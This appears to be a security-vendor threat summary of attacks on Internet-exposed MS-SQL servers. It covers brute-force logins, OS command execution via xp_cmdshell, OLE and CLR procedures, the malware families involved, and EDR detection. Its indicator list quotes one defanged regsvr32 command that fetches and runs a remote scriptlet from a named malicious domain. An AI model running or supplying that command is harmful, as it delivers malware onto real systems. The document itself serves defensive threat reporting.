Threat Research

AhnLab EDR Detects Attacks Targeting MS-SQL Servers

Ahnlab

MS-SQL servers exposed to the Internet are commonly scanned and attacked using brute force or dictionary attacks to gain administrator access, enabling threat actors to install malware and take control of the system. ASEC blog cases show TargetCompany’s Mallox ransomware and Remcos RAT spread via MS-SQL, with other actors such as LemonDuck, Kingminer, Vollgar CoinMiner, Trigona, Cobalt Strike, Proxyware, and Andariel leveraging this vector. #Mallox #Remcos #LemonDuck #Kingminer #VollgarCoinMiner #Trigona #CobaltStrike #Proxyware #Andariel #NukeSped #MS-SQL

Keypoints

  • MS-SQL servers are targeted via port 1433, with brute force or dictionary attacks to obtain sa/admin privileges.
  • LemonDuck can propagate by self-spreading to poorly managed MS-SQL servers, sometimes without prior scanning.
  • Malware gains OS command execution rights through MS-SQL features like xp_cmdshell, OLE Automation Procedures, and CLR stored procedures.
  • AhnLab EDR detects key behaviors including sa logins, brute force/dictionary login failures, and MS-SQL executing OS commands for early warning.
  • Various actors—including ransomware, CoinMiner, and APT groups—target MS-SQL servers, with NukeSped backdoor used by Andariel in some cases.
  • Administrators should use strong, rotate passwords, apply patches, and firewall MS-SQL exposure to restrict attacker access.

MITRE Techniques

  • [T1110] Brute Force – Attacker logs in to the MS-SQL server through brute force or dictionary attacks. “they attempt to log in to the confirmed MS-SQL server through brute force or dictionary attacks.”
  • [T1059] Command and Scripting Interpreter – Windows Command Shell (xp_cmdshell) used to execute OS commands. “xp_cmdshell commands provide a feature that executes commands received as arguments in Windows shell.”
  • [T1218] Signed Binary Proxy Execution – OLE Automation Procedures and CLR stored procedures used to execute malicious commands. “The method that uses the OLE stored procedure involves exploiting OLE’s feature to execute other applications.” “The CLR stored procedure is similar to the extended stored procedure, but it can be distinguished by its use of .NET DLLs.”

Indicators of Compromise

  • [Port] 1433 – scanning for and accessing MS-SQL servers via port 1433; example: “scanning for servers with the 1433 port open.”
  • [Domain] js.f4321y[.]com – used in a regsvr32 delivery line: “regsvr32 /u /s /i:hxxp://js.f4321y[.]com:280/v.sct scrobj.dll”
  • [File] scrobj.dll – referenced in the same regsvr32 delivery command line

Read more: https://asec.ahnlab.com/en/66282/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint